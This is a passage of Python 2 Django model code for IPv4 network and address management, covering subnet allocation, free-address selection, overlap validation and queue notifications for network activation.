# Checks if it is subnet/supernet of any
# existing network
in_range = network_in_range(
self.vlan, subnet, type_ipv4)
if not in_range:
continue
# Otherwise, this subnet will be USED
network_found = subnet
if network_type:
internal_network_type = network_type
elif config.ip_config.network_type is not None:
internal_network_type = config.ip_config.network_type
else:
self.log.error(
u'Parameter tipo_rede is invalid. Value: %s', network_type)
raise InvalidValueError(
None, 'network_type', network_type)
# Stop generation logic
stop = True
break
# If not IPv4
else:
# Throw an exception
raise ConfigEnvironmentInvalidError(
None, u'Invalid Configuration')
# Checks whether any available network was found
if network_found is None:
# If not found, an exception is thrown
raise NetworkIPv4AddressNotAvailableError(
None, u'Unavailable address to create a NetworkIPv4.')
# Set octs by network generated
self.oct1, self.oct2, self.oct3, self.oct4 = str(
network_found.network).split('.')
# Set block by network generated
self.block = network_found.prefixlen
# Set mask by network generated
self.mask_oct1, self.mask_oct2, self.mask_oct3, self.mask_oct4 = str(
network_found.netmask).split('.')
# Set broadcast by network generated
self.broadcast = network_found.broadcast
try:
self.network_type = internal_network_type
self.ambient_vip = evip
self.save()
transaction.commit()
except Exception, e:
self.log.error(u'Error persisting a NetworkIPv4.')
raise NetworkIPv4Error(
e, u'Error persisting a NetworkIPv4.')
except (ValueError, TypeError, AddressValueError), e:
raise ConfigEnvironmentInvalidError(e, u'Invalid Configuration')
# Return vlan map
vlan_map = dict()
vlan_map['id'] = self.vlan.id
vlan_map['nome'] = self.vlan.nome
vlan_map['num_vlan'] = self.vlan.num_vlan
vlan_map['id_tipo_rede'] = self.network_type.id
vlan_map['id_ambiente'] = self.vlan.ambiente.id
vlan_map['rede_oct1'] = self.oct1
vlan_map['rede_oct2'] = self.oct2
vlan_map['rede_oct3'] = self.oct3
vlan_map['rede_oct4'] = self.oct4
vlan_map['bloco'] = self.block
vlan_map['mascara_oct1'] = self.mask_oct1
vlan_map['mascara_oct2'] = self.mask_oct2
vlan_map['mascara_oct3'] = self.mask_oct3
vlan_map['mascara_oct4'] = self.mask_oct4
vlan_map['broadcast'] = self.broadcast
vlan_map['descricao'] = self.vlan.descricao
vlan_map['acl_file_name'] = self.vlan.acl_file_name
vlan_map['acl_valida'] = self.vlan.acl_valida
vlan_map['acl_file_name_v6'] = self.vlan.acl_file_name_v6
vlan_map['acl_valida_v6'] = self.vlan.acl_valida_v6
vlan_map['ativada'] = self.vlan.ativada
vlan_map['id_network'] = self.id
map = dict()
map['vlan'] = vlan_map
return map
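# A minimal standalone sketch of the allocation idea used above, assuming the
# bundled ipaddr fork: subdivide each configured supernet and take the first
# candidate that does not overlap an existing network. Names and addresses
# here are illustrative only.
#
#     >>> from networkapi.infrastructure.ipaddr import IPv4Network
#     >>> existing = [IPv4Network('10.0.0.0/24')]
#     >>> supernet = IPv4Network('10.0.0.0/16')
#     >>> free = next(s for s in supernet.iter_subnets(new_prefix=24)
#     ...             if not any(s in n or n in s for n in existing))
#     >>> str(free)
#     '10.0.1.0/24'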
def delete(self):
try:
for ip in self.ip_set.all():
ip.delete()
super(NetworkIPv4, self).delete()
except IpCantBeRemovedFromVip, e:
# Network id and ReqVip id
net_name = str(self.oct1) + '.' + str(self.oct2) + '.' + \
str(self.oct3) + '.' + str(self.oct4) + '/' + str(self.block)
cause = {'Net': net_name, 'ReqVip': e.cause}
raise IpCantBeRemovedFromVip(
cause, 'This network has a VIP pointing to it and cannot be deleted')
def create_v3(self, networkv4):
"""
Create a new NetworkIPv4.
"""
self.oct1 = networkv4.get('oct1')
self.oct2 = networkv4.get('oct2')
self.oct3 = networkv4.get('oct3')
self.oct4 = networkv4.get('oct4')
self.block = networkv4.get('prefix')
self.mask_oct1 = networkv4.get('mask_oct1')
self.mask_oct2 = networkv4.get('mask_oct2')
self.mask_oct3 = networkv4.get('mask_oct3')
self.mask_oct4 = networkv4.get('mask_oct4')
self.cluster_unit = networkv4.get('cluster_unit')
validate_network = True
if self.oct1 is None and self.oct2 is None and self.oct3 is None and self.oct4 is None:
self.allocate_network(networkv4.get(
'vlan'), networkv4.get('prefix'))
validate_network = False
elif self.block is not None and self.oct1 is not None and self.oct2 is not None and self.oct3 is not None and self.oct4 is not None:
ip = IPNetwork('%s/%s' % (self.formated_octs, self.block))
self.broadcast = ip.broadcast.compressed
mask = ip.netmask.exploded.split('.')
self.mask_oct1 = mask[0]
self.mask_oct2 = mask[1]
self.mask_oct3 = mask[2]
self.mask_oct4 = mask[3]
elif self.mask_oct1 is not None and self.mask_oct2 is not None and self.mask_oct3 is not None and self.mask_oct4 is not None:
ip = IPNetwork('%s/%s' % (self.formated_octs, self.mask_formated))
self.block = ip.prefixlen
else:
raise Exception('Either the block or the mask must be provided.')
vlan_model = get_model('vlan', 'Vlan')
self.vlan = vlan_model().get_by_pk(networkv4.get('vlan'))
tiporede_model = get_model('vlan', 'TipoRede')
self.network_type = tiporede_model().get_by_pk(networkv4.get('network_type'))
# has environmentvip
if networkv4.get('environmentvip'):
environmentvip_model = get_model('ambiente', 'EnvironmentVip')
self.environmentvip = environmentvip_model().get_by_pk(
networkv4.get('environmentvip'))
self.validate_v3()
if validate_network:
self.validate_network()
self.save()
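# A hedged example of the dict create_v3() expects (all pks and values are
# hypothetical; mask octets may be omitted when 'prefix' is given, and
# vice versa):
#
#     net = NetworkIPv4()
#     net.create_v3({
#         'oct1': 10, 'oct2': 0, 'oct3': 0, 'oct4': 0,
#         'prefix': 24,
#         'vlan': 1,                # Vlan pk
#         'network_type': 2,        # TipoRede pk
#         'environmentvip': None,   # optional EnvironmentVip pk
#         'cluster_unit': None,
#     })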
def update_v3(self, networkv4):
"""
Update an existing NetworkIPv4.
"""
self.cluster_unit = networkv4.get('cluster_unit')
# vlan_model = get_model('vlan', 'Vlan')
tiporede_model = get_model('vlan', 'TipoRede')
# self.vlan = vlan_model().get_by_pk(networkv4.get('vlan'))
self.network_type = tiporede_model().get_by_pk(networkv4.get('network_type'))
# has environmentvip
if networkv4.get('environmentvip'):
environmentvip_model = get_model('ambiente', 'EnvironmentVip')
self.environmentvip = environmentvip_model().get_by_pk(
networkv4.get('environmentvip'))
self.validate_v3()
self.save()
def delete_v3(self):
"""
Method V3 to remove NetworkIPv4.
Before removing the NetworkIPv4, removes all of its IPv4 addresses.
@raise IpCantBeRemovedFromVip: Ip is associated with created
Vip Request.
"""
try:
for ip in self.ip_set.all():
ip.delete_v3()
super(NetworkIPv4, self).delete()
except IpCantBeRemovedFromVip, e:
# Network id and Vip Request id
raise Exception(
'This network has a VIP pointing to it, and can not be deleted. '
'Network:%s, Vip Request: %s' % (self.mask_formated, e.cause))
def validate_v3(self):
"""
Validate networkIPv4.
"""
# validate if the network is allowed in the environment
configs = self.vlan.ambiente.configs.all()
self.vlan.allow_networks_environment(configs, [self], [])
def validate_network(self):
"""
Verify whether the network conflicts with networks in the environment or in related environments.
"""
envs = self.vlan.get_environment_related()
net_ip = [IPNetwork(self.networkv4)]
# Filter network_ipv4 where the environment has a config permitting
# the current network to be inserted.
nets_envs = list()
for env in envs:
# get configs v4 of environment
nts = [IPNetwork(config.ip_config.subnet)
for config in env.configs.filter(
ip_config__type=IP_VERSION.IPv4[0])]
# get networks that may intersect with the current network
if self.vlan.verify_intersect(nts, net_ip)[0]:
self.log.info('Environment %s has config (%s) permitting the '
'insertion of network %s' % (env.name, nts, net_ip))
for vlan in env.vlans:
for network_ipv4 in vlan.networks_ipv4:
nets_envs.append(IPNetwork(network_ipv4.networkv4))
if nets_envs:
subnet, supernet = self.vlan.verify_intersect(nets_envs, net_ip)
if subnet or supernet:
raise Exception(
'One of the equipments associated with the environment '
'of this Vlan is also associated with another environment '
'that has a network in the same range; add filters to the '
'environments if necessary. Your network: %s, network '
'already created: %s' % (subnet, supernet))
subnet, supernet = self.vlan.verify_intersect(net_ip, nets_envs)
if subnet or supernet:
raise Exception(
'One of the equipments associated with the environment '
'of this Vlan is also associated with another environment '
'that has a network in the same range; add filters to the '
'environments if necessary. Your network: %s, network '
'already created: %s' % (supernet, subnet))
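# A hedged sketch of the kind of subnet/supernet test performed above
# (assuming the bundled ipaddr fork; addresses are illustrative): a /25
# nested inside an existing /24 counts as an intersection.
#
#     >>> from networkapi.infrastructure.ipaddr import IPv4Network
#     >>> IPv4Network('10.0.0.0/25') in IPv4Network('10.0.0.0/24')
#     True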
def activate_v3(self):
"""
Send an activate notification of the v4 network to the ACL
configuration system.
Update status column to 'active = 1'.
@raise NetworkIPv4Error: Error activating a NetworkIPv4.
"""
try:
self.active = 1
self.save()
net_slz = get_app('api_network', 'serializers.v3')
serializer = net_slz.NetworkIPv4V3Serializer(
self,
include=('vlan__details__environment__basic',))
data_to_queue = serializer.data
data_to_queue.update({
'description': queue_keys.NETWORKv4_ACTIVATE
})
# Send to Queue
queue_manager = QueueManager()
queue_manager.append({
'action': queue_keys.NETWORKv4_ACTIVATE,
'kind': queue_keys.NETWORKv4_KEY,
'data': data_to_queue
})
queue_manager.send()
except Exception, e:
self.log.error(u'Error activating NetworkIPv4.')
raise NetworkIPv4Error(e, u'Error activating NetworkIPv4.')
def deactivate_v3(self):
"""
Send a deactivate notification of the v4 network to the ACL
configuration system.
Update status column to 'active = 0'.
@raise NetworkIPv4Error: Error disabling a NetworkIPv4.
"""
try:
net_slz = get_app('api_network', 'serializers.v3')
self.active = 0
serializer = net_slz.NetworkIPv4V3Serializer(
self,
include=('vlan__details__environment__basic',))
data_to_queue = serializer.data
data_to_queue.update({
'description': queue_keys.NETWORKv4_DEACTIVATE
})
# Send to Queue
queue_manager = QueueManager()
queue_manager.append({
'action': queue_keys.NETWORKv4_DEACTIVATE,
'kind': queue_keys.NETWORKv4_KEY,
'data': data_to_queue
})
queue_manager.send()
self.save()
except Exception, e:
self.log.error(u'Error disabling NetworkIPv4.')
raise NetworkIPv4Error(e, u'Error disabling NetworkIPv4.')
def allocate_network(self, id_vlan, prefix=None):
"""Allocate new NetworkIPv4
@raise VlanNotFoundError: Vlan is not registered.
@raise VlanError: Failed to search for the Vlan
@raise ConfigEnvironmentInvalidError: Invalid Environment Configuration or not registered
@raise NetworkIPv4Error: Error persisting a NetworkIPv4.
@raise NetworkIPv4AddressNotAvailableError: Unavailable address to create a NetworkIPv4.
@raise InvalidValueError: Network type does not exist.
"""
vlan_model = get_model('vlan', 'Vlan')
self.vlan = vlan_model().get_by_pk(id_vlan)
nets_envs, netv6 = self.vlan.get_networks_related(
has_netv6=False, exclude_current=False)
nets_envs = [IPNetwork(net.networkv4) for net in nets_envs]
try:
configs = self.vlan.ambiente.configs.filter(
ip_config__type=IP_VERSION.IPv4[0])
# For each configuration found in the environment
for config in configs:
net4 = IPNetwork(config.ip_config.subnet)
if prefix is not None:
new_prefix = int(prefix)
else:
new_prefix = int(config.ip_config.new_prefix)
self.log.info(
u'Prefix that will be used: %s' % new_prefix)
subnets = net4.iter_subnets(new_prefix=new_prefix)
for subnet in subnets:
try:
self.vlan.verify_networks(nets_envs, [subnet])
except Exception:
# Subnet conflicts with an existing network; try the next candidate
continue
else:
# Set octs by network generated
self.oct1, self.oct2, self.oct3, self.oct4 = str(
subnet.network).split('.')
# Set block by network generated
self.block = subnet.prefixlen
self.broadcast = subnet.broadcast.compressed
mask = subnet.netmask.exploded.split('.')
self.mask_oct1 = mask[0]
self.mask_oct2 = mask[1]
self.mask_oct3 = mask[2]
self.mask_oct4 = mask[3]
return
# No available network was found in any configuration;
# an exception is thrown
raise NetworkIPv4AddressNotAvailableError(
None, u'Unavailable address to create a NetworkIPv4.')
except (ValueError, TypeError, AddressValueError), e:
raise ConfigEnvironmentInvalidError(e, u'Invalid Configuration')
class Ip(BaseModel):
id = models.AutoField(
primary_key=True,
db_column='id_ip'
)
oct4 = models.IntegerField()
oct3 = models.IntegerField()
oct2 = models.IntegerField()
oct1 = models.IntegerField()
descricao = models.CharField(
max_length=100,
blank=True
)
networkipv4 = models.ForeignKey(
'ip.NetworkIPv4',
db_column='id_redeipv4'
)
log = logging.getLogger('Ip')
class Meta(BaseModel.Meta):
db_table = u'ips'
managed = True
unique_together = ('oct1', 'oct2', 'oct3', 'oct4', 'networkipv4')
def _get_formated_ip(self):
"""Returns formated ip."""
return '%s.%s.%s.%s' % (self.oct1, self.oct2, self.oct3, self.oct4)
ip_formated = property(_get_formated_ip)
def _get_equipments(self):
"""Returns equipments list."""
ipeqs = self.ipequipamento_set.all().select_related('equipamento')
eqpts = [ipeq.equipamento for ipeq in ipeqs]
return eqpts
equipments = property(_get_equipments)
def _get_vips(self):
"""Returns vips list."""
vips = self.viprequest_set.all()
return vips
vips = property(_get_vips)
def _get_server_pool_members(self):
"""Returns pool members list."""
server_pool_members = self.serverpoolmember_set.all()
return server_pool_members
server_pool_members = property(_get_server_pool_members)
@classmethod
def list_by_network(cls, id_network):
"""Get IP LIST by id_network.
@return: IP List.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return Ip.objects.filter(networkipv4=id_network)
except ObjectDoesNotExist, e:
raise IpNotFoundError(
e, u'There is no IP with network_id = %s.' % id_network)
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP')
@classmethod
def list_by_environment_and_equipment(cls, id_ambiente, id_equipment):
"""Get IP LIST by id_network.
@return: IP List.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return Ip.objects.filter(networkipv4__vlan__ambiente__id=id_ambiente, ipequipamento__equipamento__id=id_equipment)
except ObjectDoesNotExist, e:
raise IpNotFoundError(
e, u'There is no IP for environment = %s and equipment = %s.' % (id_ambiente, id_equipment))
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP')
@classmethod
def get_by_pk(cls, id):
"""Get IP by id.
@return: IP.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return Ip.objects.filter(id=id).uniqueResult()
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'There is no IP with pk = %s.' % id)
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP')
def delete_ip4(self, user, id_ip):
try:
ip = self.get_by_pk(id_ip)
ip.delete()
except IpNotFoundError, e:
raise IpNotFoundError(None, e)
except Exception, e:
self.log.error(u'Failure to delete the IP.')
raise IpError(e, u'Failure to delete the IP')
@classmethod
def get_available_ip(cls, id_network):
"""Get a available Ipv4 for networkIPv4
@return: Available Ipv4
@raise IpNotAvailableError: NetworkIPv4 does not has available Ipv4
"""
networkipv4 = NetworkIPv4().get_by_pk(id_network)
# Cast to API
net4 = IPv4Network('%d.%d.%d.%d/%d' % (networkipv4.oct1, networkipv4.oct2,
networkipv4.oct3, networkipv4.oct4, networkipv4.block))
# Find all ips related to the network
ips = Ip.objects.filter(networkipv4__id=networkipv4.id)
# Cast all to API class
ipsv4 = set(
[(IPv4Address('%d.%d.%d.%d' % (ip.oct1, ip.oct2, ip.oct3, ip.oct4))) for ip in ips])
# Get configuration
conf = Configuration.get()
selected_ip = None
# For each ip generated
i = 0
for ip in net4.iterhosts():
# Skip the reserved ranges of IPs (config)
i = i + 1
if i >= conf.IPv4_MIN and i < (net4.numhosts - conf.IPv4_MAX):
# If IP generated was not used
if ip not in ipsv4:
# Use it
selected_ip = ip
# Stop generation
return selected_ip
if selected_ip is None:
raise IpNotAvailableError(
None, u'No IP available to NETWORK %s.' % networkipv4.id)
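# Sketch of the reservation window applied above (illustrative numbers,
# not actual config values): with IPv4_MIN = 2 and IPv4_MAX = 2 on a /24
# (numhosts = 256), only host indexes 2..253 are candidates.
#
#     >>> numhosts = 256
#     >>> IPv4_MIN, IPv4_MAX = 2, 2
#     >>> window = [i for i in range(1, numhosts - 1)
#     ...           if i >= IPv4_MIN and i < numhosts - IPv4_MAX]
#     >>> window[0], window[-1]
#     (2, 253)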
@classmethod
def get_first_available_ip(cls, id_network, topdown=False):
"""Get a first available Ipv4 for networkIPv4
@return: Available Ipv4
@raise IpNotAvailableError: NetworkIPv4 does not has available Ipv4
"""
networkipv4 = NetworkIPv4().get_by_pk(id_network)
# Cast to API
net4 = IPv4Network('%d.%d.%d.%d/%d' % (networkipv4.oct1, networkipv4.oct2,
networkipv4.oct3, networkipv4.oct4, networkipv4.block))
# Find all ips related to the network
ips = Ip.objects.filter(networkipv4__id=networkipv4.id)
# Cast all to API class
ipsv4 = set(
[(IPv4Address('%d.%d.%d.%d' % (ip.oct1, ip.oct2, ip.oct3, ip.oct4))) for ip in ips])
selected_ip = None
if topdown:
method = net4.iterhostsTopDown
else:
method = net4.iterhosts
# For each ip generated
for ip in method():
# If IP generated was not used
if ip not in ipsv4:
# Use it
selected_ip = ip
# Stop generation
return selected_ip
if selected_ip is None:
raise IpNotAvailableError(
None, u'No IP available to NETWORK %s.' % networkipv4.id)
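# Usage sketch (network_id is hypothetical): pick the lowest free address,
# or the highest one when allocating from the top of the range.
#
#     ip_low = Ip.get_first_available_ip(network_id)
#     ip_high = Ip.get_first_available_ip(network_id, topdown=True)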
@classmethod
def get_last_available_ip(cls, id_network):
"""Get an available Ipv4 for networkIPv4 from end of range
@return: Available Ipv4
@raise IpNotAvailableError: NetworkIPv4 does not has available Ipv4
"""
networkipv4 = NetworkIPv4().get_by_pk(id_network)
# Cast to API
net4 = IPv4Network('%d.%d.%d.%d/%d' % (networkipv4.oct1, networkipv4.oct2,
networkipv4.oct3, networkipv4.oct4, networkipv4.block))
# Find all ips related to the network
ips = Ip.objects.filter(networkipv4__id=networkipv4.id)
# Cast all to API class
ipsv4 = set(
[(IPv4Address('%d.%d.%d.%d' % (ip.oct1, ip.oct2, ip.oct3, ip.oct4))) for ip in ips])
selected_ip = None
# For each ip generated, iterating from the end of the range
# (iterhostsTopDown comes from the bundled ipaddr fork, as used in
# get_first_available_ip above; matches the docstring's intent)
for ip in net4.iterhostsTopDown():
# If IP generated was not used
if ip not in ipsv4:
# Use it
selected_ip = ip
# Stop generation
return selected_ip
if selected_ip is None:
raise IpNotAvailableError(
None, u'No IP available to NETWORK %s.' % networkipv4.id)
def edit_ipv4(self, user):
try:
# Cast to API
net4 = IPv4Network('%d.%d.%d.%d/%d' % (self.networkipv4.oct1, self.networkipv4.oct2,
self.networkipv4.oct3, self.networkipv4.oct4, self.networkipv4.block))
# Find all ips related to the network
ips = Ip.objects.filter(networkipv4__id=self.networkipv4.id)
ip4_object = IPv4Address(
'%s.%s.%s.%s' % (self.oct1, self.oct2, self.oct3, self.oct4))
# Cast all to API class
ipsv4 = set(
[IPv4Address('%d.%d.%d.%d' % (ip.oct1, ip.oct2, ip.oct3, ip.oct4)) for ip in ips])
flag = True
if ip4_object not in ipsv4:
flag = False
if ip4_object in net4:
# Get configuration
# conf = Configuration.get()
first_ip_network = int(net4.network)
bcast_ip_network = int(net4.broadcast)
ipv4_network = int(ip4_object)
if ipv4_network >= (first_ip_network) and ipv4_network < (bcast_ip_network):
flag = True
else:
ip4_aux = self.get_by_octs_and_net(
self.oct1, self.oct2, self.oct3, self.oct4, self.networkipv4.id)
if self.id != ip4_aux.id:
raise IpNotAvailableError(None, u'Ip %s.%s.%s.%s already in use by network %s.' % (
self.oct1, self.oct2, self.oct3, self.oct4, self.networkipv4.id))
if flag:
self.save()
else:
raise IpNotAvailableError(None, u'Ip %s.%s.%s.%s not available for network %s.' % (
self.oct1, self.oct2, self.oct3, self.oct4, self.networkipv4.id))
except IpEquipmentAlreadyAssociation, e:
self.log.error(e)
raise IpEquipmentAlreadyAssociation(None, e)
except AddressValueError:
raise InvalidValueError(
None, 'ip', u'%s.%s.%s.%s' % (self.oct1, self.oct2, self.oct3, self.oct4))
except IpNotAvailableError, e:
raise IpNotAvailableError(None, u'Ip %s.%s.%s.%s not available for network %s.' % (
self.oct1, self.oct2, self.oct3, self.oct4, self.networkipv4.id))
except IpError, e:
self.log.error(
u'Error adding new IP or relationship ip-equipment.')
raise IpError(
e, u'Error adding new IP or relationship ip-equipment.')
def save_ipv4(self, equipment_id, user, net):
try:
already_ip = False
# Cast to API
net4 = IPv4Network(
'%d.%d.%d.%d/%d' % (net.oct1, net.oct2, net.oct3, net.oct4, net.block))
# Find all ips related to the network
ips = Ip.objects.filter(networkipv4__id=net.id)
ip4_object = IPv4Address(
'%s.%s.%s.%s' % (self.oct1, self.oct2, self.oct3, self.oct4))
# Cast all to API class
ipsv4 = set(
[IPv4Address('%d.%d.%d.%d' % (ip.oct1, ip.oct2, ip.oct3, ip.oct4)) for ip in ips])
flag = False
if ip4_object not in ipsv4:
if ip4_object in net4:
# Get configuration
# conf = Configuration.get()
first_ip_network = int(net4.network)
bcast_ip_network = int(net4.broadcast)
ipv4_network = int(ip4_object)
if ipv4_network >= (first_ip_network) and ipv4_network < (bcast_ip_network):
flag = True
else:
ip_aux = self.get_by_octs_and_net(
self.oct1, self.oct2, self.oct3, self.oct4, net.id)
try:
IpEquipamento.get_by_ip(ip_aux.id)
raise IpEquipmentAlreadyAssociation(None, u'Ip %s.%s.%s.%s is already associated with an Equipment. Try using the association screen for this Ip.' % (
self.oct1, self.oct2, self.oct3, self.oct4))
except IpEquipmentNotFoundError, e:
flag = True
already_ip = True
if flag:
equipment = Equipamento().get_by_pk(equipment_id)
ip_equipment = IpEquipamento()
if not already_ip:
self.networkipv4_id = net.id
self.save()
ip_equipment.ip = self
else:
ip_equipment.ip = ip_aux
if self.descricao is not None and len(self.descricao) > 0:
ip_aux.descricao = self.descricao
ip_aux.save()
ip_equipment.equipamento = equipment
# # Filter case 2 - Adding a new IpEquip for an equipment that already has an ip in another network with the same range ##
# Get all IpEquipamento related to this equipment
ip_equips = IpEquipamento.objects.filter(
equipamento=equipment_id)
for ip_test in [ip_equip.ip for ip_equip in ip_equips]:
if ip_test.networkipv4.oct1 == self.networkipv4.oct1 and \
ip_test.networkipv4.oct2 == self.networkipv4.oct2 and \
ip_test.networkipv4.oct3 == self.networkipv4.oct3 and \
ip_test.networkipv4.oct4 == self.networkipv4.oct4 and \
ip_test.networkipv4.block == self.networkipv4.block and \
ip_test.networkipv4 != self.networkipv4:
# Filter testing
if ip_test.networkipv4.vlan.ambiente.filter is None or self.networkipv4.vlan.ambiente.filter is None:
raise IpRangeAlreadyAssociation(
None, u'Equipment is already associated with another ip with the same ip range.')
else:
# Test both environment's filters
tp_equip_list_one = list()
for fet in FilterEquipType.objects.filter(filter=self.networkipv4.vlan.ambiente.filter.id):
tp_equip_list_one.append(fet.equiptype)
tp_equip_list_two = list()
for fet in FilterEquipType.objects.filter(filter=ip_test.networkipv4.vlan.ambiente.filter.id):
tp_equip_list_two.append(fet.equiptype)
if equipment.tipo_equipamento not in tp_equip_list_one or equipment.tipo_equipamento not in tp_equip_list_two:
raise IpRangeAlreadyAssociation(
None, u'Equipment is already associated with another ip with the same ip range.')
# # Filter case 2 - end ##
ip_equipment.save()
# Makes Environment Equipment association
try:
equipment_environment = EquipamentoAmbiente()
equipment_environment.equipamento = equipment
equipment_environment.ambiente = net.vlan.ambiente
equipment_environment.create(user)
except EquipamentoAmbienteDuplicatedError, e:
# If already exists, OK !
pass
else:
raise IpNotAvailableError(None, u'Ip %s.%s.%s.%s not available for network %s.' % (
self.oct1, self.oct2, self.oct3, self.oct4, net.id))
except IpRangeAlreadyAssociation, e:
raise IpRangeAlreadyAssociation(None, e.message)
except IpEquipmentAlreadyAssociation, e:
raise IpEquipmentAlreadyAssociation(None, e.message)
except AddressValueError:
raise InvalidValueError(
None, 'ip', u'%s.%s.%s.%s' % (self.oct1, self.oct2, self.oct3, self.oct4))
except IpNotAvailableError, e:
raise IpNotAvailableError(None, u'Ip %s.%s.%s.%s not available for network %s.' % (
self.oct1, self.oct2, self.oct3, self.oct4, net.id))
except (IpError, EquipamentoError), e:
self.log.error(
u'Error adding new IP or relationship ip-equipment.')
raise IpError(
e, u'Error adding new IP or relationship ip-equipment.')
def create(self, authenticated_user, equipment_id, id, new):
"""Persist an IPv4 and associate it to an equipment.
If the equipment was not related to the VLAN environment, this creates the relationship
@return: Nothing
@raise NetworkIPv4NotFoundError: NetworkIPv4 does not exist.
@raise NetworkIPv4Error: Error finding NetworkIPv4.
@raise EquipamentoNotFoundError: Equipment does not exist.
@raise EquipamentoError: Error finding Equipment.
@raise IpNotAvailableError: No IP available to VLAN.
@raise IpError: Error persisting in database.
"""
if new is False:
# Search vlan by id
vlan = Vlan().get_by_pk(id)
# Get first networkipv4 related to vlan
try:
self.networkipv4 = vlan.networkipv4_set.order_by('id')[0]
except IndexError, e:
self.log.error(
u'Error finding the first networkipv4 from vlan.')
raise NetworkIPv4NotFoundError(
e, u'Error finding the first networkipv4 from vlan.')
else:
self.networkipv4 = NetworkIPv4().get_by_pk(id)
# Cast to API
net4 = IPv4Network('%d.%d.%d.%d/%d' % (self.networkipv4.oct1, self.networkipv4.oct2,
self.networkipv4.oct3, self.networkipv4.oct4, self.networkipv4.block))
# Find all ips related to the network
ips = Ip.objects.filter(networkipv4__id=self.networkipv4.id)
# Cast all to API class
ipsv4 = set(
[(IPv4Address('%d.%d.%d.%d' % (ip.oct1, ip.oct2, ip.oct3, ip.oct4))) for ip in ips])
# Get configuration
conf = Configuration.get()
selected_ip = None
# For each ip generated
i = 0
for ip in net4.iterhosts():
# Skip the reserved ranges of IPs (config)
i = i + 1
if i >= conf.IPv4_MIN and i < (net4.numhosts - conf.IPv4_MAX):
# If IP generated was not used
if ip not in ipsv4:
# Use it
selected_ip = ip
# Stop generation
break
if selected_ip is None:
raise IpNotAvailableError(
None, u'No IP available to VLAN %s.' % self.networkipv4.vlan.num_vlan)
self.oct1, self.oct2, self.oct3, self.oct4 = str(
selected_ip).split('.')
equipment = Equipamento().get_by_pk(equipment_id)
try:
self.save()
ip_equipment = IpEquipamento()
ip_equipment.ip = self
ip_equipment.equipamento = equipment
ip_equipment.save(authenticated_user)
try:
equipment_environment = EquipamentoAmbiente().get_by_equipment_environment(equipment_id,
self.networkipv4.vlan.ambiente_id)
except EquipamentoAmbienteNotFoundError:
equipment_environment = EquipamentoAmbiente()
equipment_environment.equipamento = equipment
equipment_environment.ambiente = self.networkipv4.vlan.ambiente
equipment_environment.save(authenticated_user)
except Exception, e:
self.log.error(
u'Error adding new IP or relationship ip-equipment.')
raise IpError(
e, u'Error adding new IP or relationship ip-equipment.')
def get_by_octs_equipment(self, oct1, oct2, oct3, oct4, equip_id):
"""Get IP by octs and equip_id.
@return: IP.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return Ip.objects.get(oct1=oct1, oct2=oct2, oct3=oct3, oct4=oct4, ipequipamento__equipamento__id=equip_id)
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'There is no IP %s.%s.%s.%s for the equipment %s.' % (
oct1, oct2, oct3, oct4, equip_id))
except Exception, e:
self.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP.')
@classmethod
def get_by_octs_and_net(cls, oct1, oct2, oct3, oct4, id_network):
"""Get IP by octs and net.
@return: IP.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return Ip.objects.get(oct1=oct1, oct2=oct2, oct3=oct3, oct4=oct4, networkipv4=id_network)
except ObjectDoesNotExist, e:
raise IpNotFoundError(
e, u'There is no IP = %s.%s.%s.%s.' % (oct1, oct2, oct3, oct4))
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP.')
@classmethod
def get_by_octs_and_environment_vip(cls, oct1, oct2, oct3, oct4, id_evip, valid=True):
"""Get IP by octs and environment vip.
@return: IP.
@raise IpNotFoundByEquipAndVipError: IP is not related to the equipment.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
ips = Ip.objects.filter(oct1=oct1, oct2=oct2, oct3=oct3, oct4=oct4)
if ips.count() == 0:
raise IpNotFoundError(None)
if valid is True:
return Ip.objects.get(oct1=oct1, oct2=oct2, oct3=oct3, oct4=oct4,
networkipv4__ambient_vip__id=id_evip)
else:
for ip in ips:
if ip.networkipv4.ambient_vip:
if ip.networkipv4.ambient_vip.id == id_evip:
return ip
else:
environments = Ambiente.objects.filter(
vlan__networkipv4__ambient_vip__id=id_evip)
for env in environments:
if ip.networkipv4.vlan.ambiente.divisao_dc.id == env.divisao_dc.id \
and ip.networkipv4.vlan.ambiente.ambiente_logico.id == env.ambiente_logico.id:
return ip
raise ObjectDoesNotExist()
except ObjectDoesNotExist, e:
evip = EnvironmentVip.get_by_pk(id_evip)
msg = u'Ipv4 is not related to the Vip Environment: %s.' % evip.show_environment_vip()
cls.log.error(msg)
raise IpNotFoundByEquipAndVipError(e, msg)
except IpNotFoundError, e:
msg = u'Ipv4 "%s.%s.%s.%s" não exite.' % (oct1, oct2, oct3, oct4)
cls.log.error(msg)
raise IpNotFoundError(e, msg)
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP.')
@classmethod
def get_by_octs_and_environment(cls, oct1, oct2, oct3, oct4, id_environment):
"""Get IP by octs and environment.
@return: IP.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
